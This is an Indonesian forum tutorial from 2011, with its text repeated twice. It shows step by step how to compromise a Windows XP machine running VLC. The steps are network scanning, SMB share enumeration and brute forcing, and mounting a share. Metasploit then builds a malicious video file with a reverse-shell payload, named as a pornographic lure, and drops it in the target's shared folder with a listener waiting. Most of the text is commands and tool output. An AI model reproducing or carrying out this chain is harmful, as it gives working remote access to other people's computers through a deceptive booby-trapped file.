05-06-2011, 12:14 AM
ok kembali lagi bersama ane zee eichel super ganteng dan anti maho.. kali ini kita akan belajar metasploit yang berlaku terhadap windows xp3 yang terinstall vlc media player. Knp vlc di bawa-bwa? ya karena exploit ini nantinya akan mengunakan exploit metasploit untuk vlc .
Target : windows xp3 yang terinstall vlc media player
Tested on backtrack R2
First Step --#
Kita coba cek kira2 target apa aja yang lagi idup.. alias kompinya lagi nyala
Second Step --#
ip address 192.168.1.34 itu ip add ane laptop ane ( backtrack ) sedangkan ip address 192.168.1.33 itu ip address di kompi ane ( windows ) dan yang ekor 32 itu virtualbox ip.. ya memang lagi gk ane pasang ..
soalnya ini ane test di kamar ane .. ane kan dari dulu cuma ngetes - ngetes gk pernah di praktekan di luar ,.. coz ane bukan hacker :apn:
ok lanjut ah .. berikutnya kita scan ip target ,. dalam hal ini kompi ane yang ane install windows xp3
ok sudah ane tandai di situ bahwa target cocok.. dan port yang di butuhkan yaitu 445 memang terbuka
Third Step --#
Nah seperti yang ane janjikan pada judul .. ane hendak memanfaatkan file sharing untuk melakukan iject ..... kita cari tau nyok password jika memang ada dengan memanfaatkan inguma.py
seep sudah tuh hasilnya sudah ane tandai dengna warna merah .....
4th Step --#
ok lanjut aja ya Langkah berikutnya kita buka koneksi file sharingnya agar terkonek dengan backtrack kita . gunakan fasilitas smbclient.py
Nah perhatikan file2 yang di share oleh kompi target telah muncul . E$ , tools_music, IPC$, print$, SharedDocs, Music, ADMIN$, C$, Printer. Kalo sudah tentu saja kita harus meng amountnya terlebih dahulu untuk nantinya kita memindahkan file backdoor yang akan kita buat pada step selanjutnya
5th Step --#
ok deh sekarang kita amount aja ...di sini ane amount folder tools_music....
w0w isi directorynya ternyata ada installer vlc .. bisa kita anggap aja berarti owner kompi target sudah menginstall vlc di komputernya...next om....
6th Step --#
Tiba saatnya kita membuat file backdoornya .....buka terminal metasploitnya
done ! kita telah berhasil membuat backdoor vlc file yang tersimpan di directory root
now kita tinggal mengaktifkan saja jurus pamungkas
Last - step
kita pindahkan saja file backdoor yang wa kasi nama tadi bokep_panas.avi ke directory korban ... tunggu korban mengesekusinya .... kapan di klik ya ? kwokwokw berdoa aja
Jika berhasil anda akan mendapatkan akses shell
thx to my friend sickness moderator of forum backtrack.org for this tutorial.....
Target : windows xp3 yang terinstall vlc media player
Tested on backtrack R2
First Step --#
Kita coba cek kira2 target apa aja yang lagi idup.. alias kompinya lagi nyala
Code:
root@IBTeam:~# fping -g 192.168.1.32 192.168.1.34
192.168.1.33 is alive
192.168.1.34 is alive
ICMP Host Unreachable from 192.168.1.34 for ICMP Echo sent to 192.168.1.32
ICMP Host Unreachable from 192.168.1.34 for ICMP Echo sent to 192.168.1.32
ICMP Host Unreachable from 192.168.1.34 for ICMP Echo sent to 192.168.1.32
192.168.1.32 is unreachable
root@IBTeam:~#
Second Step --#
ip address 192.168.1.34 itu ip add ane laptop ane ( backtrack ) sedangkan ip address 192.168.1.33 itu ip address di kompi ane ( windows ) dan yang ekor 32 itu virtualbox ip.. ya memang lagi gk ane pasang ..
soalnya ini ane test di kamar ane .. ane kan dari dulu cuma ngetes - ngetes gk pernah di praktekan di luar ,.. coz ane bukan hacker :apn:
ok lanjut ah .. berikutnya kita scan ip target ,. dalam hal ini kompi ane yang ane install windows xp3
Code:
root@IBTeam:~# nmap -sS -sV -f -n -O 192.168.1.33
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-05-05 14:35 WIT
Nmap scan report for 192.168.1.33
Host is up (0.00055s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 Op enSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2. 0.4 Perl/v5.10.1)
106/tcp open pop3pw Mercury/32 poppass service
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
143/tcp open imap Mercury/32 imapd 4.72
443/tcp open ssl/http Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 Op enSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2. 0.4 Perl/v5.10.1)
[color=#FF4500]445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds[/color]
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 44:87:FC:56:86:85 (Elitegroup Computer System CO.)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: Host: localhost; OS: Windows
OS and Service detection performed. Please report any incorrect results at http: //nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.91 seconds
root@IBTeam:~#
ok sudah ane tandai di situ bahwa target cocok.. dan port yang di butuhkan yaitu 445 memang terbuka
Third Step --#
Nah seperti yang ane janjikan pada judul .. ane hendak memanfaatkan file sharing untuk melakukan iject ..... kita cari tau nyok password jika memang ada dengan memanfaatkan inguma.py
Code:
root@IBTeam:/pentest/exploits/inguma# ./inguma.py
WARNING: No route found for IPv6 destination :: (no default route?)
Inguma Version 0.2
Copyright (c) 2006-2008 Joxean Koret <[email protected]>
Copyright (c) 2009-2011 Hugo Teso <[email protected]>
No module named cx_Oracle
inguma> autoscan
Target host or network: 192.168.1.33
Brute force username and passwords (y/n)[n]: y
Automagically fuzz available targets (y/n)[n]: n
Print to filename (enter for stdout):
Inguma 'autoscan' report started at Thu May 5 14:40:12 2011
------------------------------------------------------------
TCP scanning target 192.168.1.33
Scanning port 17004 (418/418)
Open Ports
----------
Port 135/loc-srv is open
Port 3306/mysql is open
Port 139/netbios-ssn is open
Port 143/imap2 is open
Port 80/www is open
Port 445/microsoft-ds is open
MAC Address target 192.168.1.33
192.168.1.33 MAC: 44:87:fc:56:86:85 Unknow
Checking if is in promiscuous state target 192.168.1.33
Target 192.168.1.33 is promiscuous: False
Identifying services target 192.168.1.33
Port 80: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
Port 135: SMB Server IBTEAM-D7EA8C87-Windows 5.1/Windows 2000 LAN Manager
Port 139: SMB Server IBTEAM-D7EA8C87-Windows 5.1/Windows 2000 LAN Manager
Port 445: SMB Server IBTEAM-D7EA8C87-Windows 5.1/Windows 2000 LAN Manager
Port 3306: Unknow
Port 143: localhost IMAP4rev1 Mercury/32 v4.72 server
Checking what ports are nated target 192.168.1.33
isnated: global name 'IP' is not defined
Detecting operating system target 192.168.1.33
An error ocurred, may be user has not enough privileges or
Couldn't find nmap OS fingerprint DB at data/nmap-os-fingerprints
Gathering NetBIOS information target 192.168.1.33
NetBIOS Information
-------------------
IBTEAM-D7EA8C87 Workstation 44-87-FC-56-86-85 ACTIVE
MSHOME Workstation 44-87-FC-56-86-85 ACTIVE GROUP
IBTEAM-D7EA8C87 Server 44-87-FC-56-86-85 ACTIVE
MSHOME Browser Server 44-87-FC-56-86-85 ACTIVE GROUP
MSHOME brother Browser 44-87-FC-56-86-85 ACTIVE
__MSBROWSE__ Unknown 44-87-FC-56-86-85 ACTIVE GROUP
Is a brother Browser.
MAC Address: 44:87:FC:56:86:85 (Unknow)
Is a Windows based server.
Connecting to the CIFS server target 192.168.1.33
[+] Trying a NULL connection ...
[+] Ok. It works.
Current connection information
------------------------------
Domain name : MSHOME
Lanman : Windows 2000 LAN Manager
Server name : IBTEAM-D7EA8C87
Operative System : Windows 5.1
Server Time : Thu, 05 May 2011 07:41:35 GMT -7
Session Key : 0
Is login required? True
Dumping RPC endpoints target 192.168.1.33
[+] Trying an anonymous connection ...
Gathered data
-------------
[+] Retrieving endpoint list from 192.168.1.33
[+] Trying protocol 80/HTTP...
[!] Protocol failed: HTTPTransport instance has no attribute '_HTTPTransport__socket'
[+] Trying protocol 445/SMB...
[!] Protocol failed: SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRnoaccess(Access denied.)
[+] Trying protocol 135/TCP...
[!] Protocol failed: unpack requires a string argument of length 12
[+] Trying protocol 139/SMB...
[!] Protocol failed: SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRnoaccess(Access denied.)
[+] Trying protocol 135/UDP...
[!] Protocol failed: timed out
No endpoints found.
Dumping SAM database target 192.168.1.33
[+] Trying an anonymous connection ...
[+] Retrieving endpoint list from 192.168.1.33
[+] Trying protocol 445/SMB...
[!] Protocol failed: SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRnoaccess(Access denied.)
samrdump: SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRnoaccess(Access denied.)
Finding 'gold' anonymously in the CIFS shares target 192.168.1.33
Valid credentials *ARE* required for target 192.168.1.33
Use the following syntax prior to rerun the module:
[color=#FF0000]user="username"
password="password"[/color]
seep sudah tuh hasilnya sudah ane tandai dengna warna merah .....
4th Step --#
ok lanjut aja ya Langkah berikutnya kita buka koneksi file sharingnya agar terkonek dengan backtrack kita . gunakan fasilitas smbclient.py
Code:
root@IBTeam:~# cd /pentest/python/impacket-examples
root@IBTeam:/pentest/python/impacket-examples# ./smbclient.py
# open 192.168.1.33
exception! open() takes exactly 3 arguments (2 given)
# open 192.168.1.33 445
# login username
# shares
E$
tools_music
IPC$
print$
SharedDocs
Music
ADMIN$
C$
Printer
Nah perhatikan file2 yang di share oleh kompi target telah muncul . E$ , tools_music, IPC$, print$, SharedDocs, Music, ADMIN$, C$, Printer. Kalo sudah tentu saja kita harus meng amountnya terlebih dahulu untuk nantinya kita memindahkan file backdoor yang akan kita buat pada step selanjutnya
5th Step --#
ok deh sekarang kita amount aja ...di sini ane amount folder tools_music....
Code:
root@IBTeam:~# smbmount //192.168.1.33/tools_music /inject/
mount error: can not change directory into mount target /inject/
root@IBTeam:~# smbmount //192.168.1.33/tools_music /media/
Password:
root@IBTeam:~# cd /media.
bash: cd: /media.: No such file or directory
root@IBTeam:~# cd /media/
root@IBTeam:/media# ls
K-Lite_Codec_Pack_700_Mega.exe vlc-1.1.9-win32.exe
root@IBTeam:/media#
w0w isi directorynya ternyata ada installer vlc .. bisa kita anggap aja berarti owner kompi target sudah menginstall vlc di komputernya...next om....
6th Step --#
Tiba saatnya kita membuat file backdoornya .....buka terminal metasploitnya
Code:
=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 642 exploits - 326 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11626 updated 103 days ago (2011.01.22)
Warning: This copy of the Metasploit Framework was last updated 103 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf > use windows/fileformat/videolan_tivo
msf exploit(videolan_tivo) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(videolan_tivo) > set FILENAME bokep_panas.avi
FILENAME => bokep_panas.avi
msf exploit(videolan_tivo) > set OUTPUTPATH /root/
OUTPUTPATH => /root/
msf exploit(videolan_tivo) > set LHOST 192.168.1.34
LHOST => 192.168.1.34
msf exploit(videolan_tivo) > exploit
[*] Creating 'bokep_panas.avi' file ...
[*] Generated output file /root/bokep_panas.avi
msf exploit(videolan_tivo) > show options
Module options (exploit/windows/fileformat/videolan_tivo):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME bokep_panas.avi yes The file name.
OUTPUTPATH /root/ yes The location of the file.
done ! kita telah berhasil membuat backdoor vlc file yang tersimpan di directory root
now kita tinggal mengaktifkan saja jurus pamungkas
Code:
=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 642 exploits - 326 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11626 updated 103 days ago (2011.01.22)
Warning: This copy of the Metasploit Framework was last updated 103 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_reverse_TCP
[-] The value specified for PAYLOAD is not valid.
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.34
LHOST => 192.168.1.34
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, none, process
LHOST 192.168.1.34 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.34:4444
[*] Starting the payload handler...
Last - step
kita pindahkan saja file backdoor yang wa kasi nama tadi bokep_panas.avi ke directory korban ... tunggu korban mengesekusinya .... kapan di klik ya ? kwokwokw berdoa aja
Code:
root@IBTeam:~# mv bokep_panas.avi /media/tools_music
root@IBTeam:~# cd /media/
root@IBTeam:/media# ls
K-Lite_Codec_Pack_700_Mega.exe vlc-1.1.9-win32.exe bokep_panas.avi
root@IBTeam:/media#
Jika berhasil anda akan mendapatkan akses shell
thx to my friend sickness moderator of forum backtrack.org for this tutorial.....
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
for more question and sharing about security and Opensource only